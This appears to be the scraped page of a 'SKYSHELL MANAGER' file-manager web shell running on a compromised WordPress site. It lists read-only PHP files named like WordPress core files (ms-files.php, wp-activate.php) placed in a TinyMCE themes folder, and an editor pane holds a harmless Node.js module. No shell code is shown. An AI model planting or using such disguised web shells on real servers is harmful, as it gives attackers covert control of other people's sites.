📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.js
module.exports = exists exists.sync = sync var fs = require('fs') var existsCache = Object.create(null) function exists (file, cb) { if (file in existsCache) return process.nextTick(cb.bind(null, existsCache[file])) fs.lstat(file, function (er) { cb(existsCache[file] = !er) }) } function sync (file) { if (file in existsCache) return existsCache[file] try { fs.lstatSync(file) existsCache[file] = true } catch (er) { existsCache[file] = false } return existsCache[file] }
Save